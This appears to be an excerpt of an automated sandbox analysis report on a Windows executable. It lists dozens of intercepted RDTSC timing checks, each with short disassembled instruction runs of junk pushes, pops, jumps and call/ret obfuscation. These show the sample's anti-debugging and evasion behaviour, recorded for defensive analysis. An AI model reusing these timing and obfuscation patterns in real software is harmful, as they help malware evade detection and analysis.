                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFB35 second address: 4FFB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF93CAAC8h 0x00000009 jmp 00007F2AF93CAAC2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFB63 second address: 4FFB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEB08 second address: 4FEB2C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2AF93CAABEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jg 00007F2AF93CAABEh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEC77 second address: 4FEC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEF98 second address: 4FEFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAAC7h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF10B second address: 4FF141 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F2AF86F4E9Ah 0x0000000c pop esi 0x0000000d pushad 0x0000000e jmp 00007F2AF86F4EA4h 0x00000013 jne 00007F2AF86F4E96h 0x00000019 popad 0x0000001a js 00007F2AF86F4E9Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5031F6 second address: 503293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F2AF93CAAB8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F2AF93CAABAh 0x00000016 mov edx, dword ptr [ebp+122D2A6Eh] 0x0000001c push 00000000h 0x0000001e jo 00007F2AF93CAABAh 0x00000024 mov dx, 9873h 0x00000028 or dword ptr [ebp+122D3152h], edi 0x0000002e push 12753186h 0x00000033 push ebx 0x00000034 push eax 0x00000035 jmp 00007F2AF93CAAC9h 0x0000003a pop eax 0x0000003b pop ebx 0x0000003c xor dword ptr [esp], 12753106h 0x00000043 and edx, 2AC5CEBEh 0x00000049 push 00000003h 0x0000004b mov esi, dword ptr [ebp+122D2A42h] 0x00000051 push 00000000h 0x00000053 sub cl, FFFFFFE8h 0x00000056 push 00000003h 0x00000058 mov dword ptr [ebp+122D34DAh], edi 0x0000005e jmp 00007F2AF93CAAC8h 0x00000063 call 00007F2AF93CAAB9h 0x00000068 push esi 0x00000069 push eax 0x0000006a push edx 0x0000006b push edi 0x0000006c pop edi 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503293 second address: 5032CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F2AF86F4EACh 0x00000013 jmp 00007F2AF86F4EA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5032CE second address: 503301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F2AF93CAAC3h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503301 second address: 503306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503306 second address: 503380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F2AF93CAAC0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jl 00007F2AF93CAAB8h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F2AF93CAAC7h 0x00000024 pop eax 0x00000025 jmp 00007F2AF93CAAC8h 0x0000002a mov si, 5B37h 0x0000002e lea ebx, dword ptr [ebp+124550C5h] 0x00000034 pushad 0x00000035 mov dword ptr [ebp+122D24F3h], esi 0x0000003b popad 0x0000003c or dword ptr [ebp+122D1832h], eax 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503380 second address: 503385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503385 second address: 50338B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503535 second address: 503539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503539 second address: 503594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dx, ax 0x00000010 push 00000000h 0x00000012 call 00007F2AF93CAAC4h 0x00000017 or dword ptr [ebp+122D188Dh], eax 0x0000001d pop edi 0x0000001e call 00007F2AF93CAAB9h 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F2AF93CAAC5h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503594 second address: 5035C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F2AF86F4EA7h 0x0000000f je 00007F2AF86F4E96h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5035C0 second address: 5035E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jo 00007F2AF93CAAC0h 0x00000011 jmp 00007F2AF93CAABAh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5035E3 second address: 5035E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6269 second address: 4E626F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5228DE second address: 5228E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5228E4 second address: 5228E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5228E8 second address: 522908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2AF86F4EA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522EFE second address: 522F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAAC7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523077 second address: 523084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2AF86F4E96h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523227 second address: 52322D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524249 second address: 52424D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524550 second address: 524566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF93CAAC0h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524566 second address: 52456A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526FD1 second address: 527013 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2AF93CAAC3h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F2AF93CAAC1h 0x00000019 ja 00007F2AF93CAAB6h 0x0000001f popad 0x00000020 js 00007F2AF93CAABCh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527013 second address: 527032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2AF86F4EA5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527032 second address: 52703B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52703B second address: 527066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F2AF86F4EA5h 0x00000014 jno 00007F2AF86F4E96h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527066 second address: 52706C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52706C second address: 527070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AF0D second address: 52AF1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABBh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AF1E second address: 52AF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2C05 second address: 4E2C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2AF93CAAC2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2C1F second address: 4E2C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2C23 second address: 4E2C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2C29 second address: 4E2C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531BBE second address: 531BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jl 00007F2AF93CAAB6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5311C4 second address: 5311C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5311C8 second address: 5311D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F2AF93CAABCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531350 second address: 531355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531498 second address: 53149E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53149E second address: 5314A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53189B second address: 5318AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2AF93CAABEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5318AB second address: 5318B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A3A second address: 531A4C instructions: 0x00000000 rdtsc 0x00000002 js 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A4C second address: 531A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A54 second address: 531A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A5D second address: 531A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A63 second address: 531A6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505D second address: 535073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF86F4EA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535073 second address: 535090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F2AF93CAABCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535571 second address: 535577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535667 second address: 53566B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53566B second address: 535675 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2AF86F4E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535675 second address: 53567A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C52 second address: 535C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C5B second address: 535C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F2AF93CAAB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C6D second address: 535CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F2AF86F4E98h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jng 00007F2AF86F4E9Ch 0x00000028 mov edi, dword ptr [ebp+122D298Ah] 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F2AF86F4E9Dh 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535D7B second address: 535D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53673B second address: 536745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53703C second address: 537080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e mov edi, 10778B0Fh 0x00000013 push 00000000h 0x00000015 jmp 00007F2AF93CAAC6h 0x0000001a xchg eax, ebx 0x0000001b push ecx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pop ecx 0x00000023 push eax 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537080 second address: 537086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A9D second address: 538AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53779E second address: 5377A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538AA3 second address: 538AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538843 second address: 538847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538AA7 second address: 538B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub si, 62EDh 0x00000013 push 00000000h 0x00000015 mov edi, dword ptr [ebp+122D29FAh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F2AF93CAAB8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov esi, dword ptr [ebp+122D34A2h] 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jnc 00007F2AF93CAAC9h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538847 second address: 538852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538B0B second address: 538B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF93CAABAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538852 second address: 53885D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538B19 second address: 538B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A00E second address: 53A012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DE36 second address: 53DE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EDFB second address: 53EDFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EDFF second address: 53EE32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2AF93CAABDh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2AF93CAAC2h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EE32 second address: 53EEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F2AF86F4E98h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F2AF86F4E98h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 mov dword ptr [ebp+124554C7h], esi 0x00000046 mov bl, 09h 0x00000048 push 00000000h 0x0000004a mov edi, eax 0x0000004c push eax 0x0000004d pushad 0x0000004e pushad 0x0000004f jmp 00007F2AF86F4E9Dh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B442 second address: 53B446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54258C second address: 542659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007F2AF86F4EA2h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F2AF86F4E98h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D2C36h] 0x00000031 push 00000000h 0x00000033 call 00007F2AF86F4EA8h 0x00000038 mov edi, dword ptr [ebp+122D358Dh] 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007F2AF86F4E98h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b jmp 00007F2AF86F4EA4h 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jmp 00007F2AF86F4EA0h 0x00000069 jmp 00007F2AF86F4EA1h 0x0000006e popad 0x0000006f rdtsc
